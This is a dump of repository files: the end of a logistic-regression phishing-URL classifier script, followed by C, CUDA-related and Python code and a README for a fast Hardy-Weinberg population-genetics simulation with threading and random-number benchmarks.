.75, 1])\n\nax.scatter(X_test[:, 0], X_test[:, 1],c = (y_test == 1 ), s=50,\n cmap=\"RdBu\", vmin=-.2, vmax=1.2,\n edgecolor=\"white\", linewidth=1)\n\nax.set(aspect=\"equal\",\n xlim=(-5, 5), ylim=(-5, 5),\n xlabel=\"$X_1$\", ylabel=\"$X_2$\")\n\nplt.show()\n\n#===========================================================================================\n\n\n# classify as features(Prefix_Suffix and URL_of_Anchor) and label with index 13\nX = phishingData.iloc[0:13,[6,14]].values\ny = phishingData.iloc[0:13,30].values\n\n#split features and label into training ang testing data\nfrom sklearn.cross_validation import train_test_split\nX_train,X_test,y_train,y_test = train_test_split(X,y,test_size=0.3,random_state=4)\n\n#perform feature scaling\nfrom sklearn.preprocessing import StandardScaler\nscalar = StandardScaler()\nX_train = scalar.fit_transform (X_train)\nX_test = scalar.transform (X_test)\n\n#Logistic Regression Classifier \nfrom sklearn.linear_model import LogisticRegression\nLRclassifier11 = LogisticRegression(C=100,random_state=0)\nLRclassifier11.fit(X_train,y_train)\n\n\nLRpredict11 = LRclassifier11.predict(X_test)\n\n#LRC training score\nLRclassifier11.score(X_train,y_train)\n\n#LRC test score\nLRclassifier11.score(X_test,y_test)\n\n#confusion matrix for printing count of misclassified samples in the test data prediction\nfrom sklearn.metrics import confusion_matrix\nLRconfusionMatrix11 = confusion_matrix(y_test,LRpredict11)\n\n#visualize the Test set \nxx, yy = np.mgrid[-5:5:.01, -5:5:.01]\ngrid = np.c_[xx.ravel(), yy.ravel()]\nprobs = LRclassifier11.predict_proba(grid)[:, 1].reshape(xx.shape)\n\nprint(probs)\n\nf, ax = plt.subplots(figsize=(8, 6))\ncontour = ax.contourf(xx, yy, probs, 25, cmap=\"RdBu\",\n vmin=0, vmax=1)\nax_c = f.colorbar(contour)\nax_c.set_label(\"$P(y = 1)$\")\nax_c.set_ticks([0, .25, .5, .75, 1])\n\nax.scatter(X_test[:, 0], X_test[:, 1],c = (y_test == 1 ), s=50,\n cmap=\"RdBu\", vmin=-.2, vmax=1.2,\n edgecolor=\"white\", linewidth=1)\n\nax.set(aspect=\"equal\",\n xlim=(-5, 5), ylim=(-5, 5),\n xlabel=\"$X_1$\", ylabel=\"$X_2$\")\n\nplt.show()\n\n\n\n\n"
}
] | 1 |
williamwisdom/biology | https://github.com/williamwisdom/biology | c57b131d5d27ff9d4b69bf19773a6759ccb0c7cb | 6db22dd6eb181a06f435e11f3b2466ca9efe9a43 | 53ece4a42d4dea04ac1fe06dc640b8e8f77560ed | refs/heads/master | 2018-10-27T04:20:22.320252 | 2018-09-25T03:54:08 | 2018-09-25T03:54:08 | 125,884,564 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7683880925178528,
"alphanum_fraction": 0.8059467673301697,
"avg_line_length": 238.625,
"blob_id": "373ee50c1d833e5464b9e94744735a8c6c98bb9f",
"content_id": "7fe7d4a119f0a1ca525ec0e38902131014b997f2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1919,
"license_type": "no_license",
"max_line_length": 685,
"num_lines": 8,
"path": "/README.md",
"repo_name": "williamwisdom/biology",
"src_encoding": "UTF-8",
"text": "# Fast Hardy-Weinberg equilibrium simulation\n\nThis project contains three versions of hardy-weinstein equilibrium simulation:\n 1. Relatively slow and easy to make python implementation, located in generations.py. Benchmarks are listed at the top of generations.py. The average is something like 150k 'matings' per second. The advantage to using this is that it is very flexible.\n 2. Relatively fast and much more difficult to make C implementation, located in generations.c. Current benchmark is 172m 'matings' per second. However, it is less flexible due to being written in C. There is a wrapper located in generations_controller.py that currently doesn't work but in theory pipes output to the C output and graphs it live in matplotlib.\n 3. Much faster GPU version currently without a pipeline for graphing, located in biology.cu. Current benchmark with 64 blocks and 128 threads per block with 16m organisms and 1 million generations is 24500m matings per second. With less organisms and generations, the benchmark reduces to e.g. 2200m matings per second with 131k organisms and 50k generations. These were all tested on a Tesla P100 GPU. CPU speed shouldn't matter. Requires less than 1GB of memory. Compile using nvcc. \n\ngenerations.c can be built by `make standard`. If you are starting this up for the first time, you should probably change the compiler it uses. Currently it links to the gcc location on my computer. I would highly recommend GCC as opposed to clang, because at least on my computer the benchmark provided by `make speedtest` (microseconds per generation of 65536) was 850µs with clang and 600µs with gcc. This was before the decisions on whether to take both bits from one parent or take one bit from each parent was moved up to the front, [this commit](https://github.com/williamwisdom/biology/commit/243696f6f1fc2dc9c289ec91199cf5e3a5890d89) so the difference is likely different now.\n"
},
{
"alpha_fraction": 0.643750011920929,
"alphanum_fraction": 0.6656249761581421,
"avg_line_length": 34.55555725097656,
"blob_id": "2c767ccbca19f3057e69ca15858bfdfb8cd42898",
"content_id": "781a0428e248049b7fe152feb928ed0976bb7ba2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1280,
"license_type": "no_license",
"max_line_length": 153,
"num_lines": 36,
"path": "/thread_testing.c",
"repo_name": "williamwisdom/biology",
"src_encoding": "UTF-8",
"text": "#include <pthread.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n\nstruct threadinfo {\n int thresh_aa;\n int thresh_ab;\n int thresh_bb;\n int nextMembers; // number of members to generate on each pass\n int **results;\n int *alldone;\n};\n\nvoid * pthread_handler(void* args){\n // Args should consist as follows: int thresh_aa, int thresh_ab, int thresh_bb, int nextMembers, int **results, int *alldone\n struct threadinfo myinfo = *(struct threadinfo*)args;\n printf(\"thresholds: aa: %d ab: %d bb: %d\\n\",myinfo.thresh_aa,myinfo.thresh_ab,myinfo.thresh_bb);\n printf(\"Generating %d members per generation\\n\",myinfo.nextMembers);\n printf(\"Results is %p and alldone is %p\\n\",myinfo.results,myinfo.alldone);\n sleep(2);\n return (void *)&myinfo;\n}\n\nint main(){\n int **results = malloc(1000*sizeof(int)*4);\n int *alldone = malloc(4*sizeof(int));\n struct threadinfo tinfo = {.thresh_aa = 18072, .thresh_ab = 51029, .thresh_bb = 65536, .results = results, .alldone = alldone, .nextMembers = 24522};\n pthread_t thread;\n int tErr;\n printf(\"about to call pthread_create\\n\");\n tErr = pthread_create(&thread , NULL, pthread_handler, (void *)&tinfo);\n pthread_join(thread, NULL);\n printf(\"finished join\\n\");\n return 0;\n}\n"
},
{
"alpha_fraction": 0.6563364863395691,
"alphanum_fraction": 0.6906474828720093,
"avg_line_length": 28.62295150756836,
"blob_id": "97ee7cf912da53dc5c2fda2674eb511c2c0c7af6",
"content_id": "2c9e8a47f3580900e5979ac18e803221190daa6c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1807,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 61,
"path": "/generations_controller.py",
"repo_name": "williamwisdom/biology",
"src_encoding": "UTF-8",
"text": "import subprocess\nimport threading\nimport random\nimport string\nimport os\nfrom os.path import expanduser\nimport sys\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\n\n\ndef auto_plot(num_generations,num_organisms,fifoname=None):\n\n\tif fifoname == None:\n\t\tfifoname = ''.join([random.choice(string.ascii_letters) for a in range(10)])\n\targs = [os.getcwd() + \"/bio\",str(num_organisms),str(num_generations),fifoname]\n\tthreading.Thread(target=subprocess.run,args=(args,)).start()\n\n\tnum_frames = int(num_generations/100)\n\tprint(f\"Running for {num_frames} frames\")\n\tresults = [[np.nan]*num_frames,[np.nan]*num_frames,[np.nan]*num_frames] # [[aa1,aa2...],[ab],[bb]]\n\n\n\tdef animate(i):\n\t\tnonlocal results\n\t\tprint(\"Ran animate\")\n\n\t\tresult = file.readline()\n\t\tif result == \"\":\n\t\t\treturn\n\t\tresult = [int(a.split(\":\")[1])/num_organisms*100 for a in result.split(\"\\t\")]\n\t\tresults[0][i//100] = result[0]\n\t\tresults[1][i//100] = result[1]\n\t\tresults[2][i//100] = result[2]\n\t\tprint(f\"{results}\")\n\n\t\taa_line.set_ydata(results[0])\n\t\tab_line.set_ydata(results[1])\n\t\tbb_line.set_ydata(results[2])\n\n\t\treturn (aa_line,ab_line,bb_line)\n\n\tfig, ax = plt.subplots()\n\tax.set_xlim(0,num_generations)\n\tax.set_ylim(0,100)\n\taa_line, = ax.plot([a for a in range(0,num_generations,100)], [np.nan for a in range(num_frames)], \\\n\t\tanimated=True,label=\"aa\")\n\tab_line, = ax.plot([a for a in range(0,num_generations,100)], [np.nan for a in range(num_frames)], \\\n\t\tanimated=True,label=\"ab\")\n\tbb_line, = ax.plot([a for a in range(0,num_generations,100)], [np.nan for a in range(num_frames)], \\\n\t\tanimated=True,label=\"bb\")\n\tax.legend()\n\tfile = open(fifoname,'r')\n\n\tani = FuncAnimation(fig, animate, frames=range(0,num_generations,100), interval=200)\n\n\tos.unlink(fifoname)\n\nauto_plot(1000,65536)\n"
},
{
"alpha_fraction": 0.56175297498703,
"alphanum_fraction": 0.620185911655426,
"avg_line_length": 34.296875,
"blob_id": "1b4713116124059ea4df8a288fd758fa98f0c2c4",
"content_id": "f005190416d8c2fa72b723e624d827f15fb2d38c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 2259,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 64,
"path": "/test_rand_speed.c",
"repo_name": "williamwisdom/biology",
"src_encoding": "UTF-8",
"text": "#include <stdlib.h>\n#include <sys/time.h>\n#include <stdio.h>\n#include <x86intrin.h>\n#include <string.h>\n#include \"fast_rand.h\"\n\n// This must be compiled with -Ofast because otherwise when you call FastRand it fetches the parameters from the struct each time\n\nint main(int argc, char **argv){\n struct timeval start;\n struct timeval end;\n\n void * random_buffer = malloc(1000000);\n long long unsigned int * long_random_buffer = (long long unsigned int *) random_buffer;\n int * int_random_buffer = (int *) random_buffer;\n unsigned short n = 0; // overflows every 65536, so no problem.\n srandomdev();\n gettimeofday(&start,NULL);\n unsigned long start_t = 1000000 * start.tv_sec + start.tv_usec;\n\n for (int i = 0; i < 125000000; i++) {\n _rdrand64_step(long_random_buffer+n);\n }\n\n gettimeofday(&end,NULL);\n unsigned long end_t = 1000000 * end.tv_sec + end.tv_usec;\n printf(\"It took %ld microseconds to generate 1 GB using rdrand(). \",end_t-start_t);\n printf(\"This is equivalent to %ld bytes/microsecond\\n\",1000000000/(end_t-start_t));\n gettimeofday(&start,NULL);\n start_t = 1000000 * start.tv_sec + start.tv_usec;\n\n for (int i = 0; i < 250000000; i++) {\n int_random_buffer[n] = random();\n n += 1;\n }\n\n gettimeofday(&end,NULL);\n end_t = 1000000 * end.tv_sec + end.tv_usec;\n printf(\"It took %ld microseconds to generate 1 GB using random(). \",end_t-start_t);\n printf(\"This is equivalent to %ld bytes/microsecond\\n\",1000000000/(end_t-start_t));\n gettimeofday(&start,NULL);\n start_t = 1000000 * start.tv_sec + start.tv_usec;\n\n n = 0;\n fastrand f = InitFastRand();\n for (int i = 0; i < 62500000; i++){\n FastRand(&f);\n int_random_buffer[n] = f.res[0];\n n += 1;\n int_random_buffer[n] = f.res[1];\n n += 1;\n int_random_buffer[n] = f.res[2];\n n += 1;\n int_random_buffer[n] = f.res[3];\n n += 1;\n }\n free(random_buffer);\n gettimeofday(&end,NULL);\n end_t = 1000000 * end.tv_sec + end.tv_usec;\n printf(\"It took %ld microseconds to generate 1 GB random bytes using FastRand(). \",end_t-start_t);\n printf(\"This is equivalent to %ld bytes/microsecond\\n\",1000000000/(end_t-start_t));\n return 0;\n}\n"
},
{
"alpha_fraction": 0.5722113847732544,
"alphanum_fraction": 0.6037326455116272,
"avg_line_length": 39.6865348815918,
"blob_id": "e96cac0268a07cda9937544d05cce72eb67eb489",
"content_id": "83d5ba3113bc82bd5c77e7cc5b0833ea4142be04",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 18432,
"license_type": "no_license",
"max_line_length": 261,
"num_lines": 453,
"path": "/generations.c",
"repo_name": "williamwisdom/biology",
"src_encoding": "UTF-8",
"text": "\n#include <stdlib.h>\n#include <fcntl.h>\n#include <unistd.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <sys/time.h>\n#include <time.h>\n#include <errno.h>\n#include <string.h>\n#include <pthread.h>\n#include <semaphore.h>\n#include <x86intrin.h>\n#include <sys/stat.h>\n\n#include \"fast_rand.h\"\n\n// Benchmark as of 3/20: (microseconds / generation of 65536)\n// 1284, 1268, 1296, 1273, 1294. Average 1283 microseconds/generation (while doing stuff in the background)\n// Benchmark as of \"no bugs, working version\" ~= 1250. I benchmarked 1247 and then 1250 while doing nothing\n// After optimizations: 1160, 1115, 1094\n// 3/27 replacement of rand function with FastRand() gives us 1005\n// 3/27 replacing reading from /dev/random with seeding random() from /dev/random and then using random() saved 15 microseconds / generation\n// 8/20 - with clang, on dad's newer computer, 850 microseconds/generation. Replace clang with GCC,\n// 600 microseconds/generation.\n// Moved decision making on whether to have one parent or two from in the core logic to outside,\n// And instead of doing individual &s for individual decisions, group them all together in popcnts.\n// Also, probably get some kind of microcode loop optimization potential. ~380 microseconds/generation\n\n// Todo: multithreading. Only two cores so not much potential.\n// Maybe you could have a random number generating core and a decision core\n\nstruct threadinfo {\n int thresh_aa;\n int thresh_ab;\n int thresh_bb;\n int next_members; // number of members to generate on each pass\n int num_generations;\n unsigned int *results;\n int *alldone;\n sem_t *semaphore;\n int thread_id;\n};\n\n\nvoid progress_generation(int thresh_aa, int thresh_ab, int thresh_bb, int next_members, int* result){\n \n // 0 | thresh_aa | thresh_ab | end = thresh_bb\n#ifdef DEBUG\n printf(\"Thresholds: %d %d %d\\t\",thresh_aa,thresh_ab,thresh_bb);\n printf(\"AA has size: %d. AB has size %d. BB has size %d\\n\",thresh_aa,thresh_ab-thresh_aa,thresh_bb-thresh_ab);\n \n int from_first[5] = {0,0,0,0,0};\n int from_second[4] = {0,0,0,0};\n \n int from_second_first[4] = {0,0,0,0};\n int from_second_second[4] = {0,0,0,0};\n int from_second_third[4] = {0,0,0,0};\n int second_outputs[2] = {0,0};\n \n short *secondIndexes = (short *)malloc(35000*sizeof(short));\n \n int num_first = 0;\n int num_second = 0;\n \n struct timeval start;\n struct timeval end;\n gettimeofday(&start,NULL);\n#endif\n \n int counts[5] = {0,0,0,0,0};\n if (next_members != 65536){\n \tdouble offset = 65536/next_members;\n \tthresh_aa *= offset;\n \tthresh_ab *= offset;\n \tthresh_bb *= offset;\n \tprintf(\"next_members != 65536\\n\");\n }\n \n fastrand rand_index = InitFastRand();\n fastrand rand_choice = InitFastRand();\n\t/*\n\t* This is a little bit complicated. In the old way, the choice over whether to have both bits\n\t* come from one parent or not was made more or less on the fly, which costs a shr and most \n\t* importantly, an evil evil branch on every iteration. This branch was so awful because if the\n\t* random number generator is good, it is unpredictable, which means you have a branch miss half\n\t* of the time. Instead, we can refactor the decision making so it happens up here. What that means\n\t* is that we decide ahead of time how many have both bits come from one parent and how many\n\t* have one bit from each parent. This means that we don't have a branch in a loop here - there's\n\t* only the loop branch, which should have >99% prediction. This should make the code much faster.\n\t*/\n int both_one_parent = 0;\n for (int i = 0; i < (next_members>>7); i += 1){ // FastRand is 128 bits = 2^7 members per fastrand\n \tFastRand(&rand_choice);\n \tboth_one_parent += __builtin_popcountll(* (rand_choice.res)) + \n \t\t\t\t\t __builtin_popcountll(* (rand_choice.res+2)); // hopefully the compiler gets it\n }\n// both_one_parent = 0;\n#ifdef DEBUG\n num_first = both_one_parent;\n num_second = next_members-both_one_parent;\n printf(\"%d first and %d second.\\n\",num_first,num_second);\n#endif\n/* int one_parent = (both_one_parent >> 3) << 3;\n int two_parents = ((next_members-both_one_parent)>>2) << 3;\n one_parent += (one_parent+two_parents - next_members); // Fixes next_members change*/\n unsigned short *short_res = (unsigned short *)rand_index.res;\n // normally rand_index.res would be typed as an int *, though really it's a 128 bit register\n // location. Unsigned shorts cover the 0-65536 range. I could handle ints also, but it would be\n // something like half as fast.\n\n // For ones where both bits come from one parent\n for (int i = 0; i < (both_one_parent>>3); i++){\n \tFastRand(&rand_index);\n \tfor (int k = 0; k < 8; k++){\n \t\tunsigned short firstIndex = short_res[k];\n \t\tcounts[(firstIndex < thresh_aa) + (firstIndex < thresh_ab)] += 1;\n \t\t// 0 = bb, 1 = ab, 2 = aa\n#ifdef DEBUG\n\t\t\tfrom_first[(firstIndex < thresh_aa) + (firstIndex < thresh_ab)] += 1;\n#endif\n \t}\n }\n counts[3] = counts[0];\n counts[0] = counts[2];\n counts[2] = 0;\n // Counts output: 0: aa 1: ab 2: ab 3: bb 4: bb , so we have to fiddle around a bit\n int two_parents = next_members - both_one_parent;\n for (int i = 0; i < (two_parents>>2); i++) {\n \t// >> 2 and not 3 because the cycle only gives 4 results, not 8, because it needs 32 bits\n \tFastRand(&rand_index);\n \tfor (int k = 0; k < 8; k++){\n \t\tunsigned short firstIndex = short_res[k];\n \t\tk++;\n \t\tunsigned short secondIndex = short_res[k];\n \t\tchar allele = 0;\n \n // Three tests for first bit: firstIndex > thresh_ab in which case it's 1. firstIndex < thresh_aa in which case it's 1. threst_aa < firstIndex < thresh_ab 50% chance\n if (firstIndex > thresh_ab) { // if it's a bb, then both alleles are b so result is b\n allele = 1;\n }\n else if (firstIndex > thresh_aa) {\n allele = secondIndex&1;\n }\n \n \t#ifdef DEBUG\n second_outputs[allele] += 1;\n \t#endif\n \n if (secondIndex > thresh_ab) { // We know second one is BB\n counts[allele+2] += 1;\n\n \t\t#ifdef DEBUG\n \tfrom_second[allele+2] += 1;\n from_second_first[allele+2] += 1; // Occur 1/4 of the time and be 1/2 2 and 1/2 3\n \t\t#endif\n }\n \n else if (secondIndex > thresh_aa) { // Second one is AB\n counts[allele+(firstIndex&2)] += 1; // This used to be firstIndex. This caused an insidious bug where aa and bb were relatively favored 10:12:10 when they should be 8:16:8\n // This used to be allele+secondIndex&2 and the &2 operated after the + so it was always 0 or 2\n \t\t#ifdef DEBUG\n from_second[allele+(firstIndex&2)] += 1;\n from_second_second[allele + (firstIndex&2)] += 1; // Should encounter 0 50% of time and 1 50% of time and give 2 50% of time and 0 50% of time. Should be 25% for all\n \t\t#endif\n }\n \n else { // second one is AA\n counts[allele] += 1;\n \t\t#ifdef DEBUG\n from_second[allele] += 1;\n from_second_third[allele] += 1;\n \t\t#endif\n }\n \t}\n }\n \n#ifdef DEBUG\n from_second[1] += from_second[2];\n from_second[2] = from_second[3];\n // aa: 0, \n gettimeofday(&end,NULL);\n printf(\"Took %ld microseconds to progress generation\\n\",(1000000 * end.tv_sec + end.tv_usec) - (1000000 * start.tv_sec + start.tv_usec));\n printf(\"From first aa: %d from second %d. From first ab: %d from second: %d. From first bb: %d from second %d\\n\",from_first[0],from_second[0],from_first[2],from_second[1],from_first[4],from_second[2]);\n#ifndef THREADED\n printf(\"First was chosen %d times. Second was chosen %d times\\n\",num_first,num_second);\n printf(\"From second started with 0 %d times and 1 %d times\\n\",second_outputs[0],second_outputs[1]);\n printf(\"From second first:\\t%d %d %d %d\\n\",from_second_first[0],from_second_first[1],from_second_first[2],from_second_first[3]);\n printf(\"From second second:\\t%d %d %d %d\\n\",from_second_second[0],from_second_second[1],from_second_second[2],from_second_second[3]);\n printf(\"From second third:\\t%d %d %d %d\\n\",from_second_third[0],from_second_third[1],from_second_third[2],from_second_third[3]);\n printf(\"0: %d, 1: %d, 2: %d 3: %d\\n\",counts[0],counts[1],counts[2],counts[3]);\n#endif\n#endif\n // 0: aa 1: ab 2: ab 3: bb 4: bb\n result[0] = counts[0]; // aa\n result[1] = counts[1] + counts[2]; // ab\n result[2] = counts[3] + counts[4]; // bb\n}\n\nvoid * pthread_handler(void* args){\n struct threadinfo myinfo = *(struct threadinfo*)args;\n int thresh_aa = myinfo.thresh_aa;\n int thresh_ab = myinfo.thresh_ab;\n int thresh_bb = myinfo.thresh_bb;\n int num_generations = myinfo.num_generations;\n int next_members = myinfo.next_members;\n unsigned int *results = myinfo.results;\n int *alldone = myinfo.alldone;\n int thread_id = myinfo.thread_id;\n sem_t *semaphore = myinfo.semaphore;\n \n int total_members_per_generation = 65536; // This should be a component of the struct\n int timeslept = 0;\n int preliminary_results[3] = {0,0,0};\n \n for (int i = 0; i < num_generations; i++){\n#ifdef DEBUG\n printf(\"loop_start thread %d generation %d\\n\",thread_id,i);\n#endif\n progress_generation(thresh_aa,thresh_ab,thresh_bb,next_members,preliminary_results);\n#ifdef DEBUG\n printf(\"wait_start %d\\n\",thread_id);\n#endif\n sem_wait(semaphore); // This has to be done for results to be consistent. Hopefully it isn't too slow.\n results[0] += preliminary_results[0];\n results[1] += preliminary_results[1];\n results[2] += preliminary_results[2];\n sem_post(semaphore);\n \n#ifdef DEBUG\n printf(\"results %d: %d %d %d\\tTotal is %d\\n\",thread_id,preliminary_results[0],preliminary_results[1],preliminary_results[2],results[0] + results[1] + results[2]);\n#endif\n \n while ((results[0] + results[1] + results[2]) != total_members_per_generation){\n struct timespec time_to_sleep = {.tv_sec = 0, .tv_nsec = 20000}; // 20 microseconds isn't too bad\n nanosleep(&time_to_sleep, NULL);\n }\n thresh_aa = results[0];\n thresh_ab = thresh_aa + results[1];\n thresh_bb = thresh_ab + results[2];\n results += 3;\n#ifdef DEBUG\n printf(\"end loop thread %d. aa: %d ab: %d bb: %d\\n\",thread_id,thresh_aa,thresh_ab,thresh_bb);\n#endif\n }\n \n printf(\"Thread %d is ending. num_generations is %d.\\n\",thread_id,num_generations);\n pthread_exit(args);\n}\n\nvoid initialize_generation(int number, int* gen){ // 14 milliseconds faster on generating 1.6 million organisms lol. 224 organisms / microsecond is good\n // AA consistently has ~17.5k while BB consistently has ~15k.\n // This is equivalent to a normal distribution. There's probably some normal distribution function I could use that's faster.\n int num_aa = 0;\n int num_ab = 0;\n int num_bb = 0;\n \n struct timeval start;\n struct timeval end;\n gettimeofday(&start,NULL);\n \n for (int i = 0;i < number/8; i++){ // 8 instead of 16 because the upper bit is always 0.\n // It would be more efficient to make this 15 or something but who cares\n int n = random();\n \n #pragma clang loop unroll(full)\n for (int j = 0; j < 8; j++){ // This needs to be unrolled\n char organism = n & 3;\n if (organism == 0){\n num_aa += 1;\n }\n else if (organism == 3){\n num_bb += 1;\n }\n else {\n num_ab += 1;\n }\n n >>= 2;\n }\n }\n \n gettimeofday(&end,NULL);\n \n#ifdef DEBUG\n printf(\"Took %ld microseconds to generate new generation with %d aa, %d ab, and %d bb\\n\",(1000000 * end.tv_sec + end.tv_usec) - (1000000 * start.tv_sec + start.tv_usec),num_aa,num_ab,num_bb);\n#endif\n \n gen[0] = num_aa;\n gen[1] = num_ab;\n gen[2] = num_bb;\n}\n\nvoid fill_random_state_buffers(){\n\tint fd = open(\"/dev/urandom\",O_RDONLY);\n\tchar * buffer = malloc(256+4);\n\tread(fd,buffer,256+4);\n\tclose(fd);\n\tunsigned int seed = (unsigned int) *buffer;\n\tbuffer += 4;\n\tinitstate(seed,buffer,256);\n}\n\nint main(int argc, char **argv){\n int num_organisms = 0;\n int num_generations = 0;\n if (argc < 3){\n num_organisms = 65536;\n#ifdef DEBUG\n num_generations = 5;\n#endif\n#ifdef SPEEDTEST\n num_generations = 1000;\n#endif\n }\n else {\n num_organisms = atoi(argv[1]);\n num_generations = atoi(argv[2]);\n if (__builtin_popcount(num_organisms) != 1){\n \tprintf(\"num_organisms must be a multiple of 2\\n\");\n \texit(1);\n }\n }\n#ifndef SPEEDTEST\n printf(\"Simulating %d organisms for %d generations\\n\",num_organisms,num_generations);\n#endif\n srandomdev(); // Seeds random() using information from /dev/random\n int initial_values[3];\n initialize_generation(num_organisms,initial_values);\n int thresh_aa = initial_values[0];\n int thresh_ab = thresh_aa + initial_values[1];\n int thresh_bb = thresh_ab + initial_values[2];\n int **results = (int **) malloc(num_generations*3*sizeof(int));\n int result[3] = {0,0,0}; \n#ifdef THREADED\n unsigned int *thread_results = malloc(num_generations*sizeof(int)*3);\n memset(thread_results, 0, num_generations*sizeof(int)*3); // Sometimes it has random pieces of data. It shouldn't and this is an easy way to fix that.\n int alldone = 0;\n sem_t *semaphore;\n if ((semaphore = sem_open(\"/semaphore\", O_CREAT, 0644, 1)) == SEM_FAILED ) { // from https://heldercorreia.com/semaphores-in-mac-os-x-fd7a7418e13b\n perror(\"sem_open\");\n exit(EXIT_FAILURE);\n }\n pthread_t threads[4];\n pthread_t thread;\n int thread_err;\n struct threadinfo tinfo = {.thresh_aa = thresh_aa, .thresh_ab = thresh_ab, .thresh_bb = thresh_bb, .num_generations = num_generations, .results = thread_results, .alldone = &alldone, .next_members = num_organisms>>2, .semaphore = semaphore, .thread_id = 0};\n for (int i = 0; i < 4; i++){\n void * thread_info = malloc(sizeof(tinfo));\n tinfo.thread_id = i;\n memcpy(thread_info,(void *)&tinfo,sizeof(tinfo)); // So we can have thread specific data, specifically thread_id\n \n thread_err = pthread_create(&thread , NULL, pthread_handler, thread_info);\n if (thread_err != 0){\n printf(\"error in thread creation: %d\\n\",thread_err);\n }\n threads[i] = thread;\n }\n int generation = 0;\n struct timeval start;\n struct timeval end;\n gettimeofday(&start,NULL);\n int k = num_generations * 3;\n int time_taken;\n struct timespec one_second = {.tv_sec = 1, .tv_nsec = 0};\n nanosleep(&one_second, NULL);\n for (int i = 0; i < k; i += 3){\n while (thread_results[i] + thread_results[i+1] + thread_results[i+2] != num_organisms){\n gettimeofday(&end,NULL);\n time_taken = (1000000 * end.tv_sec + end.tv_usec) - (1000000 * start.tv_sec + start.tv_usec);\n printf(\"Results for generation %d: %d %d %d\\n\",i/3,thread_results[i],thread_results[i+1],thread_results[i+2]);\n printf(\"Took %d microseconds to go %d generations, %d microseconds/generation\\n\",time_taken,i/3,time_taken*3/i);\n nanosleep(&one_second, NULL);\n }\n }\n while (1){\n \n }\n return 0;\n#else\n#ifdef DEBUG\n for (int i = 0; i < num_generations; i++){\n progress_generation(thresh_aa, thresh_ab, thresh_bb, num_organisms,result);\n printf(\"aa: %d ab: %d bb: %d\\n\",result[0],result[1],result[2]);\n thresh_aa = result[0];\n thresh_ab = thresh_aa + result[1];\n thresh_bb = thresh_ab + result[2];\n results[i] = result;\n }\n#else\n#ifdef SPEEDTEST\n int time_takens[20];\n int average = 0;\n for (int i = 0;i < 20; i++){\n struct timeval start;\n struct timeval end;\n gettimeofday(&start,NULL);\n for (int j = 0; j < 1000; j++) {\n progress_generation(thresh_aa, thresh_ab, thresh_bb, num_organisms, result);\n thresh_aa = result[0];\n thresh_ab = thresh_aa + result[1];\n thresh_bb = thresh_ab + result[2];\n }\n gettimeofday(&end,NULL);\n int time_taken = (1000000 * end.tv_sec + end.tv_usec) - (1000000 * start.tv_sec + start.tv_usec);\n printf(\"%d microseconds\\t\",time_taken);\n printf(\"aa: %d\\tab:%d\\tbb:%d\\n\",result[0],result[1],result[2]);\n time_takens[i] = time_taken;\n average += time_taken;\n \n initialize_generation(num_organisms,initial_values);\n thresh_aa = initial_values[0];\n thresh_ab = thresh_aa + initial_values[1];\n thresh_bb = thresh_ab + initial_values[2];\n }\n printf(\"Took on average %d microseconds per 1000 generationss or %d microseconds per generation\\n\",average/20,average/20000);\n#else\n char *fifoname = \"results\";\n if (argc == 4){\n fifoname = argv[3];\n }\n \n if (mkfifo(fifoname, 0777) == -1){\n printf(\"Failure in making fifo: %s\\n\",strerror(errno));\n }\n \n int fd = open(fifoname, O_WRONLY);\n \n printf(\"Writing results to FIFO device %s with fd %d\\n\",fifoname,fd);\n char *format_string = \"aa: %d\\tab:%d\\tbb:%d\\n\";\n char *write_string = (char *) malloc(200);\n \n for (int i = 0; i < num_generations/100; i++){\n for (int j = 0; j < 100; j++) {\n progress_generation(thresh_aa, thresh_ab, thresh_bb, num_organisms,result);\n thresh_aa = result[0];\n thresh_ab = thresh_aa + result[1];\n thresh_bb = thresh_ab + result[2];\n results[i*100 + j] = result;\n }\n int string_length = sprintf(write_string, format_string, result[0], result[1], result[2]);\n write(fd, write_string, string_length);\n if (result[0] == 0 || result[2] == 0){ // Totally shifted to one side or the other\n for (int j = i; j < num_generations/100; j++){\n write(fd, write_string, string_length);\n }\n break;\n }\n }\n close(fd);\n#endif\n#endif\n#endif\n return 0;\n}\n"
},
{
"alpha_fraction": 0.6305555701255798,
"alphanum_fraction": 0.6583333611488342,
"avg_line_length": 28.189189910888672,
"blob_id": "b64ccd459e4be3fe70a8d3ef54134b47ec03aadc",
"content_id": "00aabebccee9d56f59f8967b8d8906f4e135ee37",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1080,
"license_type": "no_license",
"max_line_length": 159,
"num_lines": 37,
"path": "/semaphore_testing.c",
"repo_name": "williamwisdom/biology",
"src_encoding": "UTF-8",
"text": "#include <pthread.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <semaphore.h>\n\nsem_t mutex;\n\nstruct threadinfo {\n int thresh_aa;\n int thresh_ab;\n int thresh_bb;\n int next_members; // number of members to generate on each pass\n int num_generations;\n int *results;\n};\n\nvoid * pthread_handler(void* args){\n // Args should consist as follows: int thresh_aa, int thresh_ab, int thresh_bb, int nextMembers, int **results, int *alldone\n struct threadinfo myinfo = *(struct threadinfo*)args;\n sem_wait(&mutex);\n printf(\"Got mutex\\n\");\n sem_post(&mutex);\n return args;\n}\n\nint main(){\n int *results = malloc(1000*sizeof(int)*4);\n struct threadinfo tinfo = {.thresh_aa = 18072, .thresh_ab = 51029, .thresh_bb = 65536, .results = results, .num_generations = 1000, .next_members = 24522};\n pthread_t thread;\n int tErr;\n printf(\"about to call pthread_create\\n\");\n tErr = pthread_create(&thread , NULL, pthread_handler, (void *)&tinfo);\n pthread_join(thread, NULL);\n printf(\"finished join\\n\");\n return 0;\n}\n"
},
{
"alpha_fraction": 0.43916448950767517,
